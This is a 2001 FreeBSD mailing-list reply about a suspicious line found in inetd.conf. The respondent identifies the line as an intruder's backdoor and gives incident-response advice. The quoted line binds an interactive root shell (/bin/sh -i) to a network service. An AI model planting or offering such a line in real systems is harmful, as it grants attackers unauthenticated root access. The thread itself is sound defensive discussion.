Date:      Thu, 02 Aug 2001 07:01:05 +1000
From:      Kal Torak <kaltorak@quake.com.au>
To:        Hayden Katzenellenbogen <haydenk@nextlevelinternet.com>
Cc:        freebsd-stable@freebsd.org
Subject:   Re: Extra Line in my inetd.conf

Hayden Katzenellenbogen wrote:

> I have noticed this line at the bottom of some of my inetd.conf files on a
> few of my machines.. it is though not commented out I have commented it out
> as well I have no idea what it does...
>
> any one care to shed some light on this?
>
> #dlip        stream  tcp     nowait  root    /bin/sh sh -i

Looks like someone hacked your box...

dlip, whatever it is sure as hell isnt meant to open an interactive
shell with root as the root user!!!

You should log connection attempts on port 7201 and see who tries
to access it... Also check your /etc/services file to make sure they
havent changed the dlip port to something else...

If this is on a few of your machines it looks like your whole network
is probably breached... You have tripwire installed? Now its time to
check your binarys and see what else is changed...

Really the only way to be sure is to format and reinstall... Who knows
what other back doors they have had time to put in place!

And your firewall should really be blocking that port anyway...